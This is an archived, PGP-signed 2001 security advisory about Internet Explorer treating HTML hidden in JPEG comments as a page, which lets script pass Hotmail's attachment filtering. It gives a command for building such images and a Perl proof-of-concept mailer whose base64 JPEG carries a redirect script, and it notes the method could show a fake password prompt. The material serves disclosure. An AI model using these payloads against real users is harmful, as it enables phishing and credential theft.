Internet Explorer Vulnerability to Web Mail-based Spoofing Attacks

2001-02-10T00:00:00
ID SECURITYVULNS:DOC:1270
Type securityvulns
Reporter Securityvulns
Modified 2001-02-10T00:00:00

Description

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

VERSIONS AFFECTED Internet Explorer 5.0 on the Macintosh and 4.0 on Windows both have the problem. IE 5 on Windows did not seem vulnerable, however it also didn't display the test image correctly, so there may still be issues.

SUMMARY First. Internet Explorer has a "feature" which makes it possible to cause it to display arbitrary HTML that is embedded in an image (or any other type of file).

Second. Hotmail at least, and most likely all other web-based mail systems, does not filter out HTML hidden in images (one can hardly blame them). As a result, the JavaScript and CSS spoofing attacks previously described on this list can be used against a Macintosh Hotmail user, and Hotmail will not filter out offending HTML, JavaScript or CSS tags. This technique may also work against some virus scanners.

DETAILS When IE reads a file from the web, it doesn't trust the Content-Type or file ending, instead it examines the first 256 bytes of the file to see if it recognizes the file type. Apparently this is considered a feature, although it's caused no-end of pain to web designers who are trying to assign a different download behavior to a particular file. The problem does not occur when the file is read from the disk.

The parser that IE uses is not terribly sophisticated. If it sees one of several common HTML tags in the first 256 bytes, it will assume that the file is an HTML file, even if the rest of it is binary garbage. Since it is possible to embed comments in a number of types of files, and those comments often occur close to the beginning of the file, it is trivial to convince IE that an image file is in fact an HTML file. Viewing this file from inside an HTML page (ie. in an img tag) will show a broken image in IE5 on the Mac and Windows, although IE4 on Windows shows the image correctly. However opening it directly in the browser will result in some garbage characters, followed by the interpreted HTML content.

To create a commented JPG file with embedded HTML, try a command such as this on a Unix box: djpeg sample.jpg | cjpeg | wrjpgcom -cfile cfile > html.jpg where 'cfile' is a file containing html. You may not need the djpeg/cjpeg combo, but my first attempt just using wrjpgcom didn't put the comment close enough to the beginning of the file.

Hotmail can be persuaded to treat an image as an attachment by giving the file a non-standard Content-Type. Since Hotmail doesn't know that the browser is going to interpret an arbitrary attachment as an HTML file, it doesn't filter the content of the file. Clicking on the attachment will cause Hotmail to scan the attachment for viruses and then ask you if you would like to download it. When you click on the download button, the window will be replaced for a brief moment with garbage characters (the raw JPG) and then the HTML will be displayed. In the case of a JavaScript or CSS exploit, the code would presumably replace the page of garbage characters with a password prompt or other item. The user would not unreasonably assume that something had gone wrong with the software and their session had expired.

CREDITS This vulnerability was originally discovered by Anders Pearson and Peter Leonard of the Columbia Center for New Media Teaching and Learning <http://ccnmtl.columbia.edu/>. They ran into it when they were attempting to embed XML in image comments. I heard about it from a discussion on the WebDesign mailing list (http://www.webdesign-l.com/) and wrote a test exploit (enclosed below) to see if Hotmail users were in fact vulnerable.

EXPLOIT The following Perl script will email a small JPG image to a user. In order to ensure that the file is treated as an attachment and not displayed inline, it has given the file the content type "image/jpg" instead of the proper "image/jpeg". If you mail this to a Mac IE Hotmail user, and they attempt to download the attached image, it will redirect their browser to one of my web sites.

Although embedding the HTML in an image makes it more likely to pass through filters, there is nothing inherent in this process that requires that it be an image. The user's expectation that they will be viewing an image file helps from a social engineering context, but even a text file that has been given a different Content-Type might pass through filters. The key issue is that the browser thinks it knows more about the file than the person who sent it, and that it is executing HTML code when the user is expecting it to download a file--before they expect to have to worry about the file's content.

!/usr/bin/perl

sendit.pl

Sends a JPG image (with a false content type) to the destination email

address. The JPG contains an embedded HTML comment which will

cause some versions of Internet Explorer to interpret the file as though

it were HTML, executing the contained JavaScript and redirecting the browser to

http://www.spamwatcher.com/.

The HTML in the comment is:

<html><head><title>foo</title><script>document.location.replace('http://www.spamwatcher.com/')</script></head><body>test</body></html>

use Net::SMTP;

die("Use: $0 from to\n") if (!$ARGV[1]); sendit($ARGV[0], $ARGV[1]);

sub sendit { my ($from, $to) = @_; my $smtp;

$smtp = Net::SMTP-&gt;new&#40;&#39;localhost&#39;&#41;;
$smtp-&gt;mail&#40;$to&#41;;
$smtp-&gt;to&#40;$to&#41;;
$smtp-&gt;data&#40;&#41;;
$smtp-&gt;datasend&#40;&quot;To: $to&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;From: $from&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;Subject: Test of html.jpg&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;Content-Type: image/jpg&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;Content-Transfer-Encoding: base64&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;Content-Disposition: attachment; filename=html.jpg&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&quot;&#92;n&quot;&#41;;
$smtp-&gt;datasend&#40;&lt;&lt;X&#41;;

/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRof Hh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwh MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL//gCJ PGh0bWw+PGhlYWQ+PHRpdGxlPmZvbzwvdGl0bGU+PHNjcmlwdD5kb2N1bWVudC5sb2NhdGlv bi5yZXBsYWNlKCdodHRwOi8vd3d3LnNwYW13YXRjaGVyLmNvbS8nKTwvc2NyaXB0PjwvaGVh ZD48Ym9keT50ZXN0PC9ib2R5PjwvaHRtbD4K/8AAEQgBQADwAwEiAAIRAQMRAf/EAB8AAAEF AQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUS ITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJChYXGBkaJSYnKCkqNDU2Nzg5OkNERUZH SElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6g4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqy s7S1tre4ubrCw8TFxsfIycrS09TV1tfY2drh4uPk5ebn6Onq8fLz9PX29/j5+v/EAB8BAAMB AQEBAQEBAQEAAAAAAAABAgMEBQYHCAkKC//EALURAAIBAgQEAwQHBQQEAAECdwABAgMRBAUh MQYSQVEHYXETIjKBCBRCkaGxwQkjM1LwFWJy0QoWJDThJfEXGBkaJicoKSo1Njc4OTpDREVG R0hJSlNUVVZXWFlaY2RlZmdoaWpzdHV2d3h5eoKDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ip qrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uLj5OXm5+jp6vLz9PX29/j5+v/aAAwDAQAC EQMRAD8A8cooor9xPNCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA ooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKK KACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigA ooooAKKKKACiiigAooooAKKKKACiiii4BRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUU UUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFd34pl1CxufENjqen+TZ+Z5VhbCOFlsGaSOVQ AhIi3RbsleHIOdxUkcJXo3jW/ub/AMKQXFw6KXv9u0XtlOJCFdiwNvGrEhpWLbiADIDhi5I8 TMLrE0FZNNvrqndPT7jSGzPOaKKK9szCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo oAKKKKACiiigAooooAKKKKACiiigArv/ABlLpkfhu1g0/VbaaZrthcQW9vaokxiaSNZQYVVl GPmCvkETDaTtY1wFdr4ssdSsNPnstQg0eSS1vVU3enWscIOUYBSViXeMpIowflaOQMCdmPFx 8VLE0LvZt9PLuu9uvpqaQ2ZxVFFFe0ZhRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUU UAFFFFABRRRQAUUUUAFFFFABRRRQAV0us/8ACRz6eW1XW0vreJlfy21qK5IP3QwQSMSeTyBw Ce2a5qul8SeKItdWVYtNS1WW7e6JMgkYMxZmwwA5JcgnHKxwj/lnlvNxSqutT5IJrW7fTbbX r8ylazOaooor0iQooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACiiigAooooAK7/xvqMesaW+owavc3kUl+S1udRmnigYhmAWN7eMIMEhSWOQGABwSOAr0bx5 d2ep6VLe6bq99eaf9vVIInkvJY4/3bhgzTDaWwEYAEEebIp3KqtXh5il9aoNp7vXottHp16b GkPhZ5zRRRXuGYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFA BRRRQAUUUUAFehePvD+p6Xp8Qv2+1w2MsVja38lq0DPCEfaigMVKqyS5JXdjYwZlcY89rsfE Wm22nWEyPZaLa3IYIFii1JJsjaxCicBMhWUkHswI5IrxcdJrE0bN7vS1+2t7pr8TSGzOOooo r2jMKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKK ACvU/iO/+gXgvEkhvJL8BnOmPAbpot4Dh5Lht0eJXwVU4ARTtBQHyyu/8YaBY6L4etriK00t LmeZ7eRY0uVeNo5GRjGXmZZF3RMCSAQGQkKWGPCzJReLw/M2nd2SSd9t30RpD4WcBRRRXumY UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA UUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFF FABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQA UUUUAFFFFABRRRQB/9k= X $smtp->quit(); }


Kee Hinckley - Somewhere.Com, LLC - Cyberspace Architects Now Playing - Folk, Rock, odd stuff - http://www.somewhere.com/playlist.cgi

I'm not sure which upsets me more: that people are so unwilling to accept responsibility for their own actions, or that they are so eager to regulate everyone else's.

-----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQA/AwUBOoJDWiZsPfdw+r2CEQJOYACdHbt/pAnHcuE5XN4ISapTVWTV+wYAoLty m1hgNpQCBUPEidOjuYGH0gc2 =AMA+ -----END PGP SIGNATURE-----